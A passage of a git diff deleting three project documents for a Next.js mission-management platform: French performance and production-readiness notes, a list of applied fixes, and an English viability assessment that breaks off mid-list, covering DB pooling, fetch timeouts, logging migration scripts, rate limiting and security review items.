connexions -- Risque d'épuisement du pool sous charge -- Pas de configuration de timeout -- Pas de monitoring des connexions - -**Impact:** 🔴 **CRITIQUE** - Peut causer des timeouts et crashes en production - -**Solution Recommandée:** -```typescript -// lib/prisma.ts - RECOMMANDÉ -export const prisma = new PrismaClient({ - datasources: { - db: { - url: env.DATABASE_URL - } - }, - log: process.env.NODE_ENV === 'production' ? [] : ['error', 'warn'], -}) - -// Configuration du pool via DATABASE_URL -// DATABASE_URL=postgresql://user:pass@host:5432/db?connection_limit=10&pool_timeout=20 -``` - -**Configuration DATABASE_URL recommandée:** -``` -postgresql://user:pass@host:5432/db?connection_limit=10&pool_timeout=20&connect_timeout=10 -``` - -**1.2 Requêtes N+1 Potentielles** - -**Fichiers à vérifier:** -- `app/api/missions/route.ts` - Include multiples relations -- `app/api/missions/all/route.ts` - Include missionUsers avec user -- `app/api/calendars/route.ts` - Vérifier les requêtes imbriquées - -**Recommandation:** Utiliser `select` au lieu de `include` quand possible, ou utiliser `Prisma.raw` pour des requêtes optimisées. - ---- - -### 2. Requêtes HTTP Externes - -#### ❌ Problèmes Identifiés - -**2.1 Timeouts Manquants** - -**Fichiers affectés:** -- `lib/services/n8n-service.ts` - Pas de timeout sur fetch -- `app/api/missions/[missionId]/generate-plan/route.ts` - Pas de timeout -- `app/api/users/[userId]/route.ts` - Pas de timeout sur Leantime API -- `app/api/rocket-chat/messages/route.ts` - Timeouts partiels -- `app/api/leantime/tasks/route.ts` - Pas de timeout - -**Exemple problématique:** -```typescript -// ❌ MAUVAIS - app/api/missions/[missionId]/generate-plan/route.ts -const response = await fetch(webhookUrl, { - method: 'POST', - headers: { 'Content-Type': 'application/json', 'x-api-key': apiKey }, - body: JSON.stringify(webhookData), -}); -// Pas de timeout - peut bloquer indéfiniment -``` - -**Solution Recommandée:** -```typescript -// ✅ BON -const controller = new AbortController(); -const timeoutId = setTimeout(() => controller.abort(), 30000); // 30s timeout - -try { - const response = await fetch(webhookUrl, { - method: 'POST', - headers: { 'Content-Type': 'application/json', 'x-api-key': apiKey }, - body: JSON.stringify(webhookData), - signal: controller.signal, - }); - clearTimeout(timeoutId); - // ... handle response -} catch (error) { - clearTimeout(timeoutId); - if (error.name === 'AbortError') { - throw new Error('Request timeout after 30s'); - } - throw error; -} -``` - -**2.2 Pas de Circuit Breaker** - -**Problème:** Si un service externe (N8N, Leantime, RocketChat) est down, toutes les requêtes échouent sans retry intelligent. - -**Recommandation:** Implémenter un circuit breaker pattern: -```typescript -// lib/utils/circuit-breaker.ts -class CircuitBreaker { - private failures = 0; - private lastFailureTime = 0; - private state: 'CLOSED' | 'OPEN' | 'HALF_OPEN' = 'CLOSED'; - - async execute(fn: () => Promise): Promise { - if (this.state === 'OPEN') { - if (Date.now() - this.lastFailureTime > 60000) { - this.state = 'HALF_OPEN'; - } else { - throw new Error('Circuit breaker is OPEN'); - } - } - - try { - const result = await fn(); - this.onSuccess(); - return result; - } catch (error) { - this.onFailure(); - throw error; - } - } - - private onSuccess() { - this.failures = 0; - this.state = 'CLOSED'; - } - - private onFailure() { - this.failures++; - this.lastFailureTime = Date.now(); - if (this.failures >= 5) { - this.state = 'OPEN'; - } - } -} -``` - ---- - -### 3. Cache et Optimisations - -#### ✅ Points Positifs -- Redis utilisé pour cache emails, notifications, messages -- Request deduplication implémentée (`lib/utils/request-deduplication.ts`) -- Cache avec TTL approprié - -#### ⚠️ Améliorations Possibles - -**3.1 Cache Database Queries** -```typescript -// Exemple: app/api/missions/route.ts -// Ajouter cache pour les requêtes fréquentes -const cacheKey = `missions:${userId}:${limit}:${offset}`; -const cached = await redis.get(cacheKey); -if (cached) return JSON.parse(cached); - -const missions = await prisma.mission.findMany(...); -await redis.setex(cacheKey, 60, JSON.stringify(missions)); // 60s TTL -``` - -**3.2 Optimisation Images Next.js** - -**Problème actuel:** -```javascript -// next.config.mjs -images: { - unoptimized: true, // ❌ Désactive l'optimisation -} -``` - -**Solution:** -```javascript -images: { - unoptimized: false, // ✅ Active l'optimisation - formats: ['image/avif', 'image/webp'], - deviceSizes: [640, 750, 828, 1080, 1200], - imageSizes: [16, 32, 48, 64, 96, 128, 256, 384], -} -``` - ---- - -### 4. WebSocket et Connexions Longues - -#### ⚠️ Problèmes Identifiés - -**4.1 RocketChat Call Listener** -- `lib/services/rocketchat-call-listener.ts` -- Pas de rate limiting sur reconnexions -- Pas de backoff exponentiel optimal -- Logs console.log excessifs (35 occurrences) - -**Recommandations:** -```typescript -// Améliorer le backoff -private reconnectDelay = 3000; -private maxReconnectAttempts = 10; - -// ✅ MEILLEUR -private getReconnectDelay(): number { - return Math.min(3000 * Math.pow(2, this.reconnectAttempts), 30000); -} -``` - -**4.2 IMAP Connection Pool** -- `lib/services/email-service.ts` -- Pool bien géré mais peut être optimisé -- Timeout de 30 minutes peut être réduit - ---- - -### 5. Logging et Monitoring - -#### ❌ Problèmes Critiques - -**5.1 Console.log en Production** - -**Statistiques:** -- 110 occurrences de `console.log/error/warn/debug` dans `lib/services/` -- 35 dans `rocketchat-call-listener.ts` -- 19 dans `refresh-manager.ts` -- 17 dans `prefetch-service.ts` - -**Impact:** -- Performance dégradée (console.log est synchrone) -- Logs non structurés -- Pas de centralisation - -**Solution:** -```typescript -// Remplacer tous les console.log par logger -// ❌ AVANT -console.log('[ROCKETCHAT] Message received', data); - -// ✅ APRÈS -logger.debug('[ROCKETCHAT] Message received', { data }); -``` - -**Action:** Créer un script de migration: -```bash -# scripts/replace-console-logs.sh -find lib/services -name "*.ts" -exec sed -i '' 's/console\.log/logger.debug/g' {} \; -find lib/services -name "*.ts" -exec sed -i '' 's/console\.error/logger.error/g' {} \; -find lib/services -name "*.ts" -exec sed -i '' 's/console\.warn/logger.warn/g' {} \; -``` - -**5.2 Pas de Métriques de Performance** - -**Recommandation:** Ajouter des métriques: -```typescript -// lib/utils/metrics.ts -export function trackApiCall(endpoint: string, duration: number) { - // Envoyer à un service de métriques (DataDog, New Relic, etc.) - logger.info('API_CALL', { endpoint, duration }); -} -``` - ---- - -## 🏗️ Problèmes de Configuration Production - -### 1. Dockerfile - -#### ❌ Problème Critique - -**Fichier:** `Dockerfile` - -```dockerfile -# ❌ MAUVAIS - Ligne 18 -RUN npx prisma migrate dev --name init -``` - -**Problème:** -- `migrate dev` crée une nouvelle migration même si la DB est à jour -- Ne doit JAMAIS être utilisé en production -- Peut causer des conflits de migrations - -**Solution:** -```dockerfile -# ✅ BON -# Ne pas faire de migrations dans le Dockerfile -# Les migrations doivent être appliquées séparément avant le déploiement -# RUN npx prisma migrate deploy # Seulement si nécessaire, et seulement en production -``` - -**Recommandation:** Utiliser `Dockerfile.prod` qui est mieux configuré, mais vérifier qu'il n'utilise pas `migrate dev`. - -### 2. Next.js Configuration - -#### ⚠️ Problèmes - -**Fichier:** `next.config.mjs` - -```javascript -// ❌ PROBLÉMATIQUE -eslint: { - ignoreDuringBuilds: true, // Cache les erreurs ESLint -}, -typescript: { - ignoreBuildErrors: true, // Cache les erreurs TypeScript -}, -images: { - unoptimized: true, // Désactive l'optimisation d'images -}, -``` - -**Recommandation:** -```javascript -// ✅ MEILLEUR -eslint: { - ignoreDuringBuilds: false, // Ou au moins en staging -}, -typescript: { - ignoreBuildErrors: false, // Corriger les erreurs TypeScript -}, -images: { - unoptimized: false, // Activer l'optimisation - formats: ['image/avif', 'image/webp'], -}, -``` - -### 3. Variables d'Environnement - -#### ⚠️ Vérifications Nécessaires - -**Variables critiques à vérifier:** -- `DATABASE_URL` - Doit inclure les paramètres de pool -- `REDIS_URL` - Doit être configuré avec timeout -- `NEXTAUTH_SECRET` - Doit être unique et fort -- Tous les tokens API (N8N, Leantime, RocketChat) - -**Recommandation:** Créer un script de validation: -```typescript -// scripts/validate-env.ts -const requiredVars = [ - 'DATABASE_URL', - 'NEXTAUTH_SECRET', - 'NEXTAUTH_URL', - // ... -]; - -for (const varName of requiredVars) { - if (!process.env[varName]) { - throw new Error(`Missing required environment variable: ${varName}`); - } -} -``` - ---- - -## 🔒 Sécurité - -### 1. Secrets dans les Logs - -#### ⚠️ Risque Modéré - -**Problème:** Vérifier que les mots de passe/tokens ne sont pas loggés. - -**Fichiers à vérifier:** -- `lib/services/email-service.ts` - Credentials IMAP -- `app/api/courrier/test-connection/route.ts` - Password dans logs - -**Solution actuelle (bonne):** -```typescript -// ✅ BON - app/api/courrier/test-connection/route.ts -console.log('Testing connection with:', { - ...body, - password: body.password ? '***' : undefined // Masqué -}); -``` - -### 2. Rate Limiting - -#### ❌ Manquant - -**Problème:** Pas de rate limiting sur les API routes. - -**Recommandation:** Implémenter avec `@upstash/ratelimit` ou middleware Next.js: -```typescript -// middleware.ts -import { Ratelimit } from '@upstash/ratelimit'; -import { Redis } from '@upstash/redis'; - -const ratelimit = new Ratelimit({ - redis: Redis.fromEnv(), - limiter: Ratelimit.slidingWindow(10, '10 s'), -}); - -export async function middleware(request: NextRequest) { - const ip = request.ip ?? '127.0.0.1'; - const { success } = await ratelimit.limit(ip); - - if (!success) { - return new Response('Rate limit exceeded', { status: 429 }); - } -} -``` - -### 3. CORS et Headers Sécurité - -#### ✅ Bon - -**Fichier:** `next.config.mjs` -- Content-Security-Policy configuré -- Headers de sécurité à ajouter si nécessaire - ---- - -## 🎯 Recommandations Prioritaires - -### Priorité 1 - CRITIQUE (Avant Production) - -1. **✅ Configurer le pool de connexions Prisma** - - Modifier `DATABASE_URL` avec `connection_limit=10&pool_timeout=20` - - Tester sous charge - -2. **✅ Corriger le Dockerfile** - - Retirer `migrate dev` - - Utiliser `migrate deploy` uniquement si nécessaire - -3. **✅ Ajouter des timeouts sur toutes les requêtes HTTP** - - Créer un utilitaire `fetchWithTimeout` - - Appliquer à tous les `fetch()` externes - -4. **✅ Remplacer console.log par logger** - - Script de migration automatique - - Vérifier tous les fichiers - -### Priorité 2 - HAUTE (Semaine 1) - -5. **✅ Implémenter Circuit Breaker** - - Pour N8N, Leantime, RocketChat - - Retry avec backoff exponentiel - -6. **✅ Activer l'optimisation d'images Next.js** - - Modifier `next.config.mjs` - - Tester les performances - -7. **✅ Ajouter Rate Limiting** - - Sur les API routes critiques - - Monitoring des limites - -### Priorité 3 - MOYENNE (Semaine 2-3) - -8. **✅ Cache des requêtes DB fréquentes** - - Missions, Calendars, Users - - TTL approprié (60-300s) - -9. **✅ Monitoring et Métriques** - - Intégrer Sentry ou équivalent - - Métriques de performance (APM) - -10. **✅ Optimiser les requêtes N+1** - - Audit des `include` Prisma - - Utiliser `select` quand possible - ---- - -## ✅ Checklist de Mise en Production - -### Pré-Déploiement - -#### Configuration -- [ ] Configurer `DATABASE_URL` avec pool settings -- [ ] Vérifier toutes les variables d'environnement -- [ ] Créer script de validation des env vars -- [ ] Configurer les secrets dans Vercel (pas en code) - -#### Code -- [ ] Corriger le Dockerfile (retirer `migrate dev`) -- [ ] Ajouter timeouts sur toutes les requêtes HTTP -- [ ] Remplacer tous les `console.log` par `logger` -- [ ] Activer l'optimisation d'images Next.js -- [ ] Corriger les erreurs TypeScript/ESLint (ou documenter pourquoi ignorées) - -#### Base de Données -- [ ] Appliquer toutes les migrations Prisma -- [ ] Créer des index sur les colonnes fréquemment queryées -- [ ] Configurer les sauvegardes automatiques -- [ ] Tester la restauration depuis backup - -#### Sécurité -- [ ] Implémenter rate limiting -- [ ] Vérifier qu'aucun secret n'est loggé -- [ ] Configurer CORS correctement -- [ ] Activer HTTPS uniquement - -#### Monitoring -- [ ] Configurer Sentry ou équivalent -- [ ] Créer endpoint `/api/health` -- [ ] Configurer les alertes Vercel -- [ ] Documenter les procédures d'alerte - -### Déploiement - -#### Staging -- [ ] Déployer en staging d'abord -- [ ] Tester toutes les fonctionnalités critiques -- [ ] Vérifier les performances sous charge -- [ ] Tester les scénarios d'erreur - -#### Production -- [ ] Appliquer les migrations Prisma -- [ ] Déployer sur Vercel -- [ ] Vérifier les health checks -- [ ] Monitorer les logs les premières heures -- [ ] Tester les fonctionnalités critiques - -### Post-Déploiement - -#### Monitoring -- [ ] Surveiller les métriques de performance -- [ ] Vérifier les logs d'erreurs -- [ ] Monitorer l'utilisation DB/Redis -- [ ] Vérifier les alertes fonctionnent - -#### Optimisation Continue -- [ ] Analyser les requêtes DB lentes -- [ ] Optimiser les endpoints les plus utilisés -- [ ] Ajuster les TTL de cache selon l'usage -- [ ] Réviser les timeouts selon les métriques - ---- - -## 📊 Métriques de Succès - -### Performance -- **Temps de réponse API:** < 200ms (p95) -- **Temps de chargement page:** < 2s (First Contentful Paint) -- **Taux d'erreur:** < 0.1% -- **Uptime:** > 99.9% - -### Base de Données -- **Connexions actives:** < 80% du pool max -- **Requêtes lentes:** < 1% des requêtes > 1s -- **Taux de cache hit:** > 70% pour les requêtes fréquentes - -### Infrastructure -- **CPU utilisation:** < 70% en moyenne -- **Mémoire:** < 80% en moyenne -- **Disque:** < 80% utilisé - ---- - -## 🔧 Scripts Utiles - -### Validation Environnement -```bash -# scripts/validate-production.sh -#!/bin/bash -set -e - -echo "Validating production environment..." - -# Vérifier les variables d'environnement -node scripts/validate-env.ts - -# Vérifier les migrations -npx prisma migrate status - -# Vérifier la connexion DB -npx prisma db execute --stdin <<< "SELECT 1" - -# Vérifier Redis -redis-cli -h $REDIS_HOST -p $REDIS_PORT ping - -echo "✅ All checks passed" -``` - -### Migration Console.log -```bash -# scripts/migrate-console-logs.sh -#!/bin/bash - -find lib/services app/api -name "*.ts" -type f | while read file; do - sed -i '' 's/console\.log(/logger.debug(/g' "$file" - sed -i '' 's/console\.error(/logger.error(/g' "$file" - sed -i '' 's/console\.warn(/logger.warn(/g' "$file" - sed -i '' 's/console\.debug(/logger.debug(/g' "$file" -done - -echo "✅ Console logs migrated to logger" -``` - -### Health Check -```typescript -// app/api/health/route.ts -import { NextResponse } from 'next/server'; -import { prisma } from '@/lib/prisma'; -import { getRedisClient } from '@/lib/redis'; - -export async function GET() { - const health = { - status: 'ok', - timestamp: new Date().toISOString(), - checks: { - database: 'unknown', - redis: 'unknown', - }, - }; - - // Check DB - try { - await prisma.$queryRaw`SELECT 1`; - health.checks.database = 'ok'; - } catch (error) { - health.checks.database = 'error'; - health.status = 'degraded'; - } - - // Check Redis - try { - const redis = getRedisClient(); - await redis.ping(); - health.checks.redis = 'ok'; - } catch (error) { - health.checks.redis = 'error'; - health.status = 'degraded'; - } - - return NextResponse.json(health, { - status: health.status === 'ok' ? 200 : 503, - }); -} -``` - ---- - -## 📚 Ressources - -- [Prisma Connection Pooling](https://www.prisma.io/docs/guides/performance-and-optimization/connection-management) -- [Next.js Production Checklist](https://nextjs.org/docs/deployment#production-checklist) -- [Vercel Best Practices](https://vercel.com/docs/concepts/deployments/best-practices) -- [PostgreSQL Performance Tuning](https://www.postgresql.org/docs/current/performance-tips.html) - ---- - -## 📝 Notes Finales - -Cette analyse identifie les problèmes critiques à résoudre avant la mise en production. Les priorités 1 doivent être traitées immédiatement, les priorités 2 dans la semaine, et les priorités 3 peuvent être planifiées après le déploiement initial. - -**Recommandation:** Créer des tickets pour chaque point de la checklist et les suivre jusqu'à résolution complète. - ---- - -**Dernière mise à jour:** $(date) diff --git a/PRODUCTION_FIXES_APPLIED.md b/PRODUCTION_FIXES_APPLIED.md deleted file mode 100644 index 450ef0b..0000000 --- a/PRODUCTION_FIXES_APPLIED.md +++ /dev/null @@ -1,290 +0,0 @@ -# Corrections Appliquées pour la Production - -Ce document liste les corrections critiques appliquées suite à l'analyse de performance et de préparation à la production. - -## ✅ Corrections Appliquées - -### 1. Utilitaire fetchWithTimeout - -**Fichier créé:** `lib/utils/fetch-with-timeout.ts` - -**Problème résolu:** Requêtes HTTP sans timeout pouvant bloquer indéfiniment. - -**Utilisation:** -```typescript -import { fetchWithTimeout, fetchJsonWithTimeout } from '@/lib/utils/fetch-with-timeout'; - -// Exemple 1: Fetch simple avec timeout -const response = await fetchWithTimeout('https://api.example.com/data', { - method: 'GET', - timeout: 10000, // 10 secondes - headers: { 'Authorization': 'Bearer token' } -}); - -// Exemple 2: Fetch avec parsing JSON automatique -const data = await fetchJsonWithTimeout('https://api.example.com/data', { - method: 'POST', - timeout: 30000, // 30 secondes - headers: { 'Content-Type': 'application/json' }, - body: JSON.stringify(payload) -}); -``` - -**Migration recommandée:** -Remplacer tous les `fetch()` dans: -- `lib/services/n8n-service.ts` -- `app/api/missions/[missionId]/generate-plan/route.ts` -- `app/api/users/[userId]/route.ts` -- `app/api/leantime/tasks/route.ts` -- `app/api/rocket-chat/messages/route.ts` - -### 2. Correction Dockerfile - -**Fichier modifié:** `Dockerfile` - -**Problème résolu:** Utilisation de `migrate dev` en production (créerait de nouvelles migrations). - -**Changement:** -```dockerfile -# ❌ AVANT -RUN npx prisma migrate dev --name init - -# ✅ APRÈS -# NOTE: Migrations should be run separately before deployment -# DO NOT use 'migrate dev' in production -# Use 'prisma migrate deploy' instead, run separately before container start -``` - -**Action requise:** Utiliser `Dockerfile.prod` pour la production, qui est déjà correctement configuré. - -### 3. Script de Validation d'Environnement - -**Fichier créé:** `scripts/validate-env.ts` - -**Problème résolu:** Variables d'environnement manquantes non détectées avant déploiement. - -**Utilisation:** -```bash -# Valider les variables d'environnement -npm run validate:env - -# Ou directement -ts-node scripts/validate-env.ts -``` - -**Fonctionnalités:** -- ✅ Vérifie toutes les variables requises -- ✅ Valide le format des URLs -- ✅ Vérifie la force de NEXTAUTH_SECRET -- ✅ Recommande les paramètres de pool DB -- ✅ Affiche des warnings pour les variables optionnelles - -**Ajouté dans package.json:** -```json -"validate:env": "ts-node scripts/validate-env.ts" -``` - -## 🔄 Migrations à Effectuer - -### Priorité 1 - CRITIQUE - -#### 1. Remplacer fetch() par fetchWithTimeout() - -**Fichiers à modifier:** - -1. **lib/services/n8n-service.ts** -```typescript -// ❌ AVANT -const response = await fetch(this.webhookUrl, { - method: 'POST', - headers: { 'Content-Type': 'application/json', 'x-api-key': this.apiKey }, - body: JSON.stringify(cleanData), -}); - -// ✅ APRÈS -import { fetchWithTimeout } from '@/lib/utils/fetch-with-timeout'; - -const response = await fetchWithTimeout(this.webhookUrl, { - method: 'POST', - timeout: 30000, // 30 secondes - headers: { 'Content-Type': 'application/json', 'x-api-key': this.apiKey }, - body: JSON.stringify(cleanData), -}); -``` - -2. **app/api/missions/[missionId]/generate-plan/route.ts** -```typescript -// ❌ AVANT -const response = await fetch(webhookUrl, { - method: 'POST', - headers: { 'Content-Type': 'application/json', 'x-api-key': apiKey }, - body: JSON.stringify(webhookData), -}); - -// ✅ APRÈS -import { fetchWithTimeout } from '@/lib/utils/fetch-with-timeout'; - -const response = await fetchWithTimeout(webhookUrl, { - method: 'POST', - timeout: 30000, - headers: { 'Content-Type': 'application/json', 'x-api-key': apiKey }, - body: JSON.stringify(webhookData), -}); -``` - -3. **app/api/users/[userId]/route.ts** (getLeantimeUserId) -```typescript -// ❌ AVANT -const userResponse = await fetch('https://agilite.slm-lab.net/api/jsonrpc', { - method: 'POST', - headers: { 'Content-Type': 'application/json', 'X-API-Key': process.env.LEANTIME_TOKEN || '' }, - body: JSON.stringify({ ... }), -}); - -// ✅ APRÈS -import { fetchJsonWithTimeout } from '@/lib/utils/fetch-with-timeout'; - -const userData = await fetchJsonWithTimeout('https://agilite.slm-lab.net/api/jsonrpc', { - method: 'POST', - timeout: 10000, // 10 secondes - headers: { 'Content-Type': 'application/json', 'X-API-Key': process.env.LEANTIME_TOKEN || '' }, - body: JSON.stringify({ ... }), -}); -``` - -#### 2. Configurer le Pool de Connexions Prisma - -**Action:** Modifier `DATABASE_URL` dans les variables d'environnement: - -```bash -# ❌ AVANT -DATABASE_URL=postgresql://user:pass@host:5432/db - -# ✅ APRÈS -DATABASE_URL=postgresql://user:pass@host:5432/db?connection_limit=10&pool_timeout=20&connect_timeout=10 -``` - -**Paramètres recommandés:** -- `connection_limit=10` - Limite le nombre de connexions simultanées -- `pool_timeout=20` - Timeout pour obtenir une connexion du pool (secondes) -- `connect_timeout=10` - Timeout pour établir une connexion (secondes) - -**Note:** Ajuster `connection_limit` selon la charge attendue et les limites du serveur PostgreSQL. - -#### 3. Remplacer console.log par logger - -**Script de migration:** -```bash -# Créer scripts/migrate-console-logs.sh -#!/bin/bash - -find lib/services app/api -name "*.ts" -type f | while read file; do - # Sauvegarder d'abord - cp "$file" "$file.bak" - - # Remplacer - sed -i '' 's/console\.log(/logger.debug(/g' "$file" - sed -i '' 's/console\.error(/logger.error(/g' "$file" - sed -i '' 's/console\.warn(/logger.warn(/g' "$file" - sed -i '' 's/console\.debug(/logger.debug(/g' "$file" - - # Vérifier que logger est importé - if ! grep -q "import.*logger" "$file" && grep -q "logger\." "$file"; then - # Ajouter l'import en haut du fichier - sed -i '' '1i\ -import { logger } from '\''@/lib/logger'\''; -' "$file" - fi -done - -echo "✅ Console logs migrated to logger" -echo "⚠️ Review changes and remove .bak files after verification" -``` - -**Fichiers prioritaires:** -- `lib/services/rocketchat-call-listener.ts` (35 occurrences) -- `lib/services/refresh-manager.ts` (19 occurrences) -- `lib/services/prefetch-service.ts` (17 occurrences) - -### Priorité 2 - HAUTE - -#### 4. Activer l'Optimisation d'Images Next.js - -**Fichier:** `next.config.mjs` - -```javascript -// ❌ AVANT -images: { - unoptimized: true, -}, - -// ✅ APRÈS -images: { - unoptimized: false, - formats: ['image/avif', 'image/webp'], - deviceSizes: [640, 750, 828, 1080, 1200], - imageSizes: [16, 32, 48, 64, 96, 128, 256, 384], -}, -``` - -#### 5. Implémenter Circuit Breaker - -Créer `lib/utils/circuit-breaker.ts` (voir exemple dans `PERFORMANCE_AND_PRODUCTION_ANALYSIS.md`). - -**Services à protéger:** -- N8N webhooks -- Leantime API -- RocketChat API - -## 📋 Checklist de Migration - -- [ ] Remplacer tous les `fetch()` par `fetchWithTimeout()` dans les fichiers listés -- [ ] Configurer `DATABASE_URL` avec les paramètres de pool -- [ ] Exécuter le script de migration console.log -- [ ] Vérifier que tous les fichiers utilisent `logger` au lieu de `console` -- [ ] Activer l'optimisation d'images dans `next.config.mjs` -- [ ] Tester toutes les fonctionnalités après les changements -- [ ] Valider l'environnement avec `npm run validate:env` -- [ ] Déployer en staging et tester -- [ ] Monitorer les performances après déploiement - -## 🧪 Tests Recommandés - -### Test de Timeout -```typescript -// Test que les timeouts fonctionnent -const start = Date.now(); -try { - await fetchWithTimeout('https://httpstat.us/200?sleep=5000', { - timeout: 2000, // 2 secondes - }); -} catch (error) { - const duration = Date.now() - start; - console.assert(duration < 3000, 'Timeout should occur before 3 seconds'); - console.assert(error.message.includes('timeout'), 'Error should mention timeout'); -} -``` - -### Test de Validation d'Environnement -```bash -# Tester avec variables manquantes -unset DATABASE_URL -npm run validate:env -# Devrait échouer avec message clair - -# Tester avec toutes les variables -# Devrait réussir -npm run validate:env -``` - -## 📚 Documentation - -Voir `PERFORMANCE_AND_PRODUCTION_ANALYSIS.md` pour: -- Analyse complète des problèmes -- Recommandations détaillées -- Métriques de succès -- Checklist complète de mise en production - ---- - -**Dernière mise à jour:** $(date) diff --git a/PRODUCTION_VIABILITY_ASSESSMENT.md b/PRODUCTION_VIABILITY_ASSESSMENT.md deleted file mode 100644 index 74ab076..0000000 --- a/PRODUCTION_VIABILITY_ASSESSMENT.md +++ /dev/null @@ -1,680 +0,0 @@ -# Production Viability Assessment - Neah Platform - -**Assessment Date:** January 2026 -**Assessed By:** Senior Software Architect -**Project:** Neah - Mission Management & Calendar Platform -**Status:** ⚠️ **CONDITIONAL APPROVAL** - Requires Critical Fixes Before Production - ---- - -## Executive Summary - -The Neah platform is a Next.js-based mission management system with calendar integration, email management, and multiple third-party integrations (Keycloak, Leantime, RocketChat, N8N, etc.). While the application demonstrates solid architectural foundations and comprehensive documentation, **several critical issues must be addressed before production deployment**. - -### Overall Assessment: **6.5/10** - Conditional Approval - -**Key Strengths:** -- ✅ Comprehensive documentation (deployment, runbook, observability) -- ✅ Modern tech stack (Next.js 16, Prisma, PostgreSQL, Redis) -- ✅ Health check endpoint implemented -- ✅ Environment variable validation with Zod -- ✅ Structured logging system -- ✅ Docker production configuration - -**Critical Blockers:** -- 🔴 **TypeScript/ESLint errors ignored in production builds** (next.config.mjs) -- 🔴 **No automated testing infrastructure** -- 🔴 **Security incident history** (backdoor vulnerability - resolved but requires audit) -- 🔴 **Excessive console.log statements** in production code -- 🔴 **No rate limiting** on API endpoints -- 🔴 **Missing environment variable validation** for many critical vars - -**High Priority Issues:** -- 🟡 Database connection pooling not explicitly configured -- 🟡 No request timeout middleware -- 🟡 Missing input validation on some API routes -- 🟡 No automated backup strategy documented -- 🟡 Limited error recovery mechanisms - ---- - -## 1. Architecture & Infrastructure - -### 1.1 Application Architecture - -**Status:** ✅ **Good** - -- **Framework:** Next.js 16.1.1 (App Router) -- **Deployment:** Vercel (serverless functions) -- **Database:** PostgreSQL 15 (self-hosted) -- **Cache:** Redis (self-hosted) -- **Storage:** S3-compatible (MinIO) - -**Strengths:** -- Modern serverless architecture suitable for scaling -- Clear separation of concerns (API routes, services, lib) -- Proper use of Next.js App Router patterns - -**Concerns:** -- No clear strategy for handling cold starts on Vercel -- Database connection from serverless functions may have latency issues -- No CDN configuration for static assets - -**Recommendations:** -- [ ] Implement database connection pooling at Prisma level -- [ ] Configure Vercel Edge Functions for high-frequency endpoints -- [ ] Set up CDN for static assets and images - -### 1.2 Infrastructure Configuration - -**Status:** ⚠️ **Needs Improvement** - -**Docker Configuration:** -- ✅ Production Dockerfile with multi-stage builds -- ✅ Non-root user in production image -- ✅ Health checks configured -- ⚠️ Resource limits defined but may need tuning -- ⚠️ No backup strategy in docker-compose.prod.yml - -**Vercel Configuration:** -- ✅ Proper build commands -- ✅ Security headers configured -- ⚠️ Function timeout set to 30s (may be insufficient for some operations) -- ⚠️ No region configuration for database proximity - -**Recommendations:** -- [ ] Add automated backup cron job to docker-compose.prod.yml -- [ ] Configure Vercel regions closer to database server -- [ ] Review and optimize function timeouts per endpoint - ---- - -## 2. Security Assessment - -### 2.1 Critical Security Issues - -**Status:** 🔴 **CRITICAL CONCERNS** - -#### Issue 1: Build Error Suppression -```javascript -// next.config.mjs -eslint: { - ignoreDuringBuilds: true, // ❌ DANGEROUS -}, -typescript: { - ignoreBuildErrors: true, // ❌ DANGEROUS -} -``` - -**Risk:** Type errors and linting issues can introduce runtime bugs in production. - -**Impact:** HIGH - Could lead to production failures - -**Recommendation:** -- [ ] **MUST FIX:** Remove error suppression, fix all TypeScript/ESLint errors -- [ ] Set up pre-commit hooks to prevent errors from reaching production -- [ ] Use CI/CD to block deployments with errors - -#### Issue 2: Security Incident History -- Previous backdoor vulnerability (CVE-2025-66478) in Next.js 15.3.1 -- **Status:** ✅ Resolved (upgraded to Next.js 16.1.1) -- **Action Required:** Security audit of all configuration files - -**Recommendations:** -- [ ] Complete security audit of all config files -- [ ] Review all dynamic imports -- [ ] Implement file integrity monitoring -- [ ] Set up automated security scanning (Snyk, npm audit) - -#### Issue 3: Missing Rate Limiting -**Status:** 🔴 **CRITICAL** - -No rate limiting found on API endpoints. This exposes the application to: -- DDoS attacks -- Brute force attacks -- Resource exhaustion - -**Recommendations:** -- [ ] Implement rate limiting middleware (e.g., `@upstash/ratelimit`) -- [ ] Configure per-endpoint limits -- [ ] Add IP-based throttling -- [ ] Set up Redis-based distributed rate limiting - -#### Issue 4: Environment Variable Validation -**Status:** ⚠️ **PARTIAL** - -**Current State:** -- ✅ Basic validation in `lib/env.ts` using Zod -- ❌ Many critical variables not validated (N8N_API_KEY, S3 credentials, etc.) - -**Missing Validations:** -- `N8N_API_KEY` (required but not in schema) -- `MINIO_ACCESS_KEY`, `MINIO_SECRET_KEY` -- `S3_BUCKET` -- `NEXTAUTH_SECRET` (should be validated for strength) - -**Recommendations:** -- [ ] Expand `env.ts` schema to include ALL environment variables -- [ ] Add validation for secret strength (NEXTAUTH_SECRET min length) -- [ ] Fail fast on missing critical variables at startup - -### 2.2 Authentication & Authorization - -**Status:** ✅ **Good** - -- ✅ NextAuth.js with Keycloak provider -- ✅ JWT-based sessions (4-hour timeout) -- ✅ Role-based access control -- ✅ Session refresh mechanism - -**Concerns:** -- ⚠️ Some API routes have inconsistent auth checks -- ⚠️ No API key rotation strategy documented - -**Recommendations:** -- [ ] Standardize auth middleware across all API routes -- [ ] Implement API key rotation for N8N integration -- [ ] Add audit logging for authentication events - -### 2.3 Data Security - -**Status:** ⚠️ **Needs Review** - -**Database:** -- ✅ Passwords stored (assumed hashed, need verification) -- ⚠️ No encryption at rest mentioned -- ⚠️ Connection strings in environment (should use secrets manager) - -**File Storage:** -- ✅ S3-compatible storage -- ⚠️ No file size limits enforced -- ⚠️ No virus scanning mentioned - -**Recommendations:** -- [ ] Verify password hashing implementation (bcrypt with proper salt rounds) -- [ ] Implement file upload size limits -- [ ] Add file type validation -- [ ] Consider encryption at rest for sensitive data - ---- - -## 3. Code Quality - -### 3.1 TypeScript & Type Safety - -**Status:** 🔴 **CRITICAL** - -**Issues:** -- TypeScript errors ignored in builds (`ignoreBuildErrors: true`) -- No strict null checks enforced -- Some `any` types found in codebase - -**Impact:** Runtime errors, difficult debugging, poor developer experience - -**Recommendations:** -- [ ] **MUST FIX:** Remove `ignoreBuildErrors`, fix all TypeScript errors -- [ ] Enable strict mode in tsconfig.json -- [ ] Add type coverage tooling -- [ ] Set up pre-commit hooks for type checking - -### 3.2 Code Practices - -**Status:** ⚠️ **Needs Improvement** - -**Issues Found:** -- 🔴 **80+ console.log/console.error statements** in production code -- ⚠️ Inconsistent error handling patterns -- ⚠️ Some API routes lack input validation -- ⚠️ No request timeout middleware - -**Console.log Locations:** -- `app/courrier/page.tsx` - Multiple console.log statements -- `app/api/courrier/unread-counts/route.ts` - console.log in production -- 